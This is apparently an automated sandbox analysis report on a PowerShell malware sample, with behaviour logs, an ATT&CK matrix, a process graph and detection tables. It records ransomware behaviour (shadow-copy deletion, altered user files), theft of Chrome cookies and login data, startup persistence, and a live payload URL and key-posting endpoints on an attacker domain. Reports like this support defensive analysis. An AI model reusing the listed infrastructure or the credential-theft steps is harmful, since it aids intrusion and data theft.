Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E530D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00007FF7E530D010
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5325C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,6_2_00007FF7E5325C00

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\gogjothegoat\payloadJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\gogjothegoat\payloadJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
1
OS Credential Dumping
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts2
Native API
12
Registry Run Keys / Startup Folder
11
Process Injection
1
Deobfuscate/Decode Files or Information
LSASS Memory13
File and Directory Discovery
Remote Desktop Protocol11
Data from Local System
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
Logon Script (Windows)12
Registry Run Keys / Startup Folder
2
Obfuscated Files or Information
Security Account Manager23
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell
Login HookLogin Hook1
Timestomp
NTDS21
Security Software Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion
Cached Domain Credentials31
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566089 Sample: back.ps1 Startdate: 01/12/2024 Architecture: WINDOWS Score: 100 106 usjjsjsj.com.ng 2->106 108 api.ipify.org 2->108 122 Antivirus detection for URL or domain 2->122 124 Suspicious powershell command line found 2->124 126 Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE 2->126 128 2 other signatures 2->128 10 powershell.exe 14 59 2->10         started        15 zed.exe 1001 2->15         started        17 powershell.exe 2->17         started        signatures3 process4 dnsIp5 110 usjjsjsj.com.ng 142.132.252.48, 443, 49721 UNIVERSITYOFWINNIPEG-ASNCA Canada 10->110 90 C:\Users\user\Documents\...\zed.exe, PE32+ 10->90 dropped 92 C:\Users\user\...\ChromeComboPack.exe, PE32+ 10->92 dropped 94 C:\Users\user\Documents\...\taskboy.ps1, ASCII 10->94 dropped 96 C:\Users\user\...\RunTaskboyOnStartup.lnk, MS 10->96 dropped 138 Drops PE files to the document folder of the user 10->138 140 Powershell creates an autostart link 10->140 142 Loading BitLocker PowerShell Module 10->142 144 Powershell drops PE file 10->144 19 zed.exe 1001 10->19         started        23 ChromeComboPack.exe 10->23         started        25 conhost.exe 10->25         started        98 C:\Users\user\AppData\Local\...\zlib1.dll, PE32+ 15->98 dropped 100 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 15->100 dropped 102 C:\Users\user\AppData\Local\...\tk86t.dll, PE32+ 15->102 dropped 104 69 other files (none is malicious) 15->104 dropped 27 zed.exe 15->27         started        29 conhost.exe 17->29         started        file6 signatures7 process8 file9 74 C:\Users\user\AppData\Local\...\zlib1.dll, PE32+ 19->74 dropped 76 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 19->76 dropped 78 C:\Users\user\AppData\Local\...\tk86t.dll, PE32+ 19->78 dropped 86 69 other files (none is malicious) 19->86 dropped 130 May disable shadow drive data (uses vssadmin) 19->130 132 Deletes shadow drive data (may be related to ransomware) 19->132 31 zed.exe 19->31         started        80 C:\Users\user\AppData\...\win32crypt.pyd, PE32+ 23->80 dropped 82 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 23->82 dropped 84 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 23->84 dropped 88 70 other files (none is malicious) 23->88 dropped 134 Found pyInstaller with non standard icon 23->134 36 ChromeComboPack.exe 23->36         started        38 conhost.exe 23->38         started        136 Modifies existing user documents (likely ransomware behavior) 27->136 40 powershell.exe 27->40         started        42 powershell.exe 27->42         started        44 vssadmin.exe 27->44         started        signatures10 process11 dnsIp12 112 api.ipify.org 104.26.13.205 CLOUDFLARENETUS United States 31->112 66 C:\Users\user\Desktop\TQDFJHPUIU.png, ASCII 31->66 dropped 68 C:\Users\user\Desktop\QCOILOQIKC.mp3, ASCII 31->68 dropped 70 C:\Users\user\Desktop\...\TQDFJHPUIU.png, ASCII 31->70 dropped 72 2 other malicious files 31->72 dropped 114 May disable shadow drive data (uses vssadmin) 31->114 116 Deletes shadow drive data (may be related to ransomware) 31->116 118 Modifies existing user documents (likely ransomware behavior) 31->118 46 powershell.exe 31->46         started        48 powershell.exe 31->48         started        50 vssadmin.exe 31->50         started        120 Tries to harvest and steal browser information (history, passwords, etc) 36->120 52 taskkill.exe 36->52         started        54 conhost.exe 40->54         started        56 conhost.exe 42->56         started        58 conhost.exe 44->58         started        file13 signatures14 process15 process16 60 conhost.exe 46->60         started        62 conhost.exe 48->62         started        64 conhost.exe 50->64         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
back.ps10%ReversingLabs
back.ps13%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD5.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA1.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA224.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA256.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA384.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA512.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_keccak.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_poly1305.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Math\_modexp.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve448.pyd0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://usjjsjsj.com.ng/post_fenec_key_user.php?0%Avira URL Cloudsafe
http://ocsp.accv.ests:0%Avira URL Cloudsafe
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=0%Avira URL Cloudsafe
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=000000000%Avira URL Cloudsafe
https://usjjsjsj.com.ng/execute/payload.zip100%Avira URL Cloudmalware
https://.VisualC0%Avira URL Cloudsafe
https://linuxreviews.org/HOWTO_change_the_mouse_speed_0%Avira URL Cloudsafe
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000p0%Avira URL Cloudsafe
http://www.microsoft.coK0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.13.205
truefalse
    high
    usjjsjsj.com.ng
    142.132.252.48
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://usjjsjsj.com.ng/execute/payload.zipfalse
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdfzed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        https://github.com/pyca/cryptography/issues/8996zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmpfalse
          high
          https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packageszed.exe, 0000000C.00000002.4735816641.00000132F84E0000.00000004.00001000.00020000.00000000.sdmpfalse
            high
            http://crl.microsoftpowershell.exe, 0000000A.00000002.3075122060.000002B03D2E5000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://usjjsjsj.com.ng/post_fenec_key_user.php?zed.exe, 0000000C.00000002.4745134537.00000132F9FD8000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/mhammond/pywin32ChromeComboPack.exefalse
                high
                http://www.microsoft.copowershell.exe, 0000000A.00000002.3080499160.000002B0571AD000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://setuptools.pypa.io/en/latest/zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmpfalse
                    high
                    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://tools.ietf.org/html/rfc2388#section-4.4zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://packaging.python.org/en/latest/specifications/core-metadata/zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://github.com/openssl/openssl/blob/master/include/openssl/pem.hzed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://github.com/pypa/packagingzed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                https://refspecs.linuxfoundation.org/elf/gabi4zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.dhimyotis.com/certignarootca.crlOzed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        http://www.ietf.org/rfc/rfbzed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://tools.ietf.org/html/rfc3610zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.xrampsecurity.com/XGCA.crlWzed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/platformdirs/platformdirszed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://peps.python.org/pep-0205/zed.exe, 0000000C.00000002.4735816641.00000132F84E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.dhimyotis.com/certignarootca.crlzed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://curl.haxx.se/rfc/cookie_spec.htmlzed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ocsp.accv.eszed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000zed.exe, 0000000C.00000002.4745134537.00000132F9FD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.4741697049.000001EE16D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3075589371.000002B03F11F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3166041238.0000025B4B651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;zed.exe, 0000000C.00000003.3080089518.00000132F842C000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamezed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyzed.exe, 0000000C.00000002.4740170642.00000132F9640000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://ocsp.accv.ests:zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://httpbin.org/getzed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F96B3000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.4741697049.000001EE178C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://packaging.python.org/en/latest/specifications/entry-points/zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-accesszed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://pypi.org/project/build/).zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codezed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://wwww.certigna.fr/autorites/0mzed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerzed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://foo/bar.tgzzed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://github.com/python/cpython/issues/86361.zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://httpbin.org/zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://wwww.certigna.fr/autorites/zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-filezed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmpfalse
                                                                                                    high
